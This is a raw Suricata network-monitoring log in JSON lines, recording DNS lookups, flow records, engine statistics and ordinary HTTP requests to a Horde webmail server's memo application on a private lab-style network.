{"timestamp":"2020-02-29T00:09:49.199155+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45436,"proto":"UDP","dns":{"type":"answer","id":5327,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:49.265090+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5367}} {"timestamp":"2020-02-29T00:09:51.000277+0000","flow_id":1140587262819103,"event_type":"flow","src_ip":"192.168.10.122","src_port":54066,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:50.047903+0000","end":"2020-02-29T00:04:50.157141+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:52.533076+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33863,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:52.641396+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52733,"proto":"UDP","dns":{"type":"answer","id":33863,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:52.641396+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52733,"proto":"UDP","dns":{"type":"answer","id":33863,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:52.717546+0000","flow_id":1083094850400979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34782,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} {"timestamp":"2020-02-29T00:09:54.266549+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5367},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":27082,"tx_id":1}} {"timestamp":"2020-02-29T00:09:56.000232+0000","event_type":"stats","stats":{"uptime":14248,"capture":{"kernel_packets":134300,"kernel_drops":0},"decoder":{"pkts":134303,"bytes":92744834,"invalid":185,"ipv4":132828,"ipv6":8,"ethernet":134303,"raw":0,"null":0,"sll":0,"tcp":127636,"udp":4992,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2734,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2750,"synack":2741,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1775,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"m
sn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2278,"failed_udp":110},"tx":{"http":4574,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2357}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2336,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17853,"memcap_state":0,"memcap_global":0},"http":{"memuse":122345,"memcap":0}}} {"timestamp":"2020-02-29T00:09:57.718624+0000","flow_id":1083094850400979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34782,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} {"timestamp":"2020-02-29T00:09:58.000585+0000","flow_id":2027510894811779,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"192.99.2.8","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:04:57.449155+0000","end":"2020-02-29T00:04:57.553288+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:10:00.000926+0000","flow_id":2220367811436415,"event_type":"flow","src_ip":"192.168.10.122","src_port":38736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:59.384895+0000","end":"2020-02-29T00:04:59.493660+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:03.000233+0000","event_type":"stats","stats":{"uptime":14255,"capture":{"kernel_packets":134305,"kernel_drops":0},"decoder":{"pkts":134306,"bytes":92745032,"invalid":185,"ipv4":132831,"ipv6":8,"ethernet":134306,"raw":0,"null":0,"sll":0,"tcp":127639,"udp":4992,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2734,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2750,"synack":2741,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1775,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2278,"failed_udp":110},"tx":{"http":4574,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2357}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2338,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked"
:65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17523,"memcap_state":0,"memcap_global":0},"http":{"memuse":70626,"memcap":0}}} {"timestamp":"2020-02-29T00:10:04.262384+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35647,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:04.370921+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52542,"proto":"UDP","dns":{"type":"answer","id":35647,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:04.370921+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52542,"proto":"UDP","dns":{"type":"answer","id":35647,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:04.390563+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} 
{"timestamp":"2020-02-29T00:10:04.390563+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:10:05.000419+0000","flow_id":607994139066563,"event_type":"flow","src_ip":"192.168.10.122","src_port":54065,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:03.934083+0000","end":"2020-02-29T00:05:04.042931+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:06.002843+0000","flow_id":473067756685678,"event_type":"flow","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":22,"bytes_toserver":3149,"bytes_toclient":20072,"start":"2020-02-29T00:08:55.297326+0000","end":"2020-02-29T00:09:05.483858+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:10:07.000736+0000","flow_id":1380207798145143,"event_type":"flow","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1182,"bytes_toclient":709,"start":"2020-02-29T00:08:38.282743+0000","end":"2020-02-29T00:09:06.456416+0000","age":28,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:07.026085+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34784,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:10:07.034032+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38273,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:07.142311+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45470,"proto":"UDP","dns":{"type":"answer","id":38273,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:10:07.142311+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45470,"proto":"UDP","dns":{"type":"answer","id":38273,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:07.185699+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:10:07.185699+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":215,"tx_id":1}} {"timestamp":"2020-02-29T00:10:07.203534+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58586,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14810,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:10:07.311742+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58586,"proto":"UDP","dns":{"type":"answer","id":14810,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:07.311742+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58586,"proto":"UDP","dns":{"type":"answer","id":14810,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:07.439849+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4933}} {"timestamp":"2020-02-29T00:10:08.000384+0000","flow_id":871962829359369,"event_type":"flow","src_ip":"192.168.10.122","src_port":37139,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:07.362761+0000","end":"2020-02-29T00:05:07.471041+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:10:10.000161+0000","event_type":"stats","stats":{"uptime":14262,"capture":{"kernel_packets":134318,"kernel_drops":0},"decoder":{"pkts":134333,"bytes":92755292,"invalid":185,"ipv4":132858,"ipv6":8,"ethernet":134333,"raw":0,"null":0,"sll":0,"tcp":127660,"udp":4998,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2735,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2751,"synack":2742,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1776,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2281,"failed_udp":110},"tx":{"http":4577,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2360}},"flow_mgr":{"closed_pruned":2718,"new_pruned":15,"est_pruned":2340,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17855,"memcap_state":0,"memcap_global":0},"http":{"memuse":122290,"memcap":0}}} 
{"timestamp":"2020-02-29T00:10:12.000172+0000","flow_id":1278752082539280,"event_type":"flow","src_ip":"192.168.10.130","src_port":34774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1233,"bytes_toclient":7100,"start":"2020-02-29T00:09:06.439056+0000","end":"2020-02-29T00:09:11.765350+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:12.397307+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34784,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4933},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":20631,"tx_id":2}} {"timestamp":"2020-02-29T00:10:14.000441+0000","flow_id":212195723528106,"event_type":"flow","src_ip":"192.168.10.122","src_port":46499,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:13.280490+0000","end":"2020-02-29T00:05:13.388520+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:10:16.000681+0000","flow_id":127932775662908,"event_type":"flow","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1233,"bytes_toclient":1174,"start":"2020-02-29T00:09:10.329020+0000","end":"2020-02-29T00:09:15.522203+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:16.614511+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34781,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30292,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:16.722829+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34781,"proto":"UDP","dns":{"type":"answer","id":30292,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:16.722829+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34781,"proto":"UDP","dns":{"type":"answer","id":30292,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:16.870668+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6981}} {"timestamp":"2020-02-29T00:10:17.000180+0000","event_type":"stats","stats":{"uptime":14269,"capture":{"kernel_packets":134333,"kernel_drops":0},"decoder":{"pkts":134338,"bytes":92755574,"invalid":185,"ipv4":132861,"ipv6":8,"ethernet":134338,"raw":0,"null":0,"sll":0,"tcp":127663,"udp":4998,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2735,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2751,"synack":2742,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1776,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2281,"failed_udp":110},"tx":{"http":4577,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2360}},"flow_mgr":{"closed_pruned":2719,"new_pruned":15,"est_pruned":2341,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17855,"memcap_state":0,"memcap_global":0},"http":{"memuse":87374,"memcap":0}}} 
{"timestamp":"2020-02-29T00:10:18.000391+0000","flow_id":2001607963729589,"event_type":"flow","src_ip":"192.168.10.130","src_port":34778,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4177,"start":"2020-02-29T00:09:12.614069+0000","end":"2020-02-29T00:09:17.822939+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:21.748959+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6981},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37763,"tx_id":0}} {"timestamp":"2020-02-29T00:10:21.758965+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41533,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12570,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:21.866749+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41533,"proto":"UDP","dns":{"type":"answer","id":12570,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
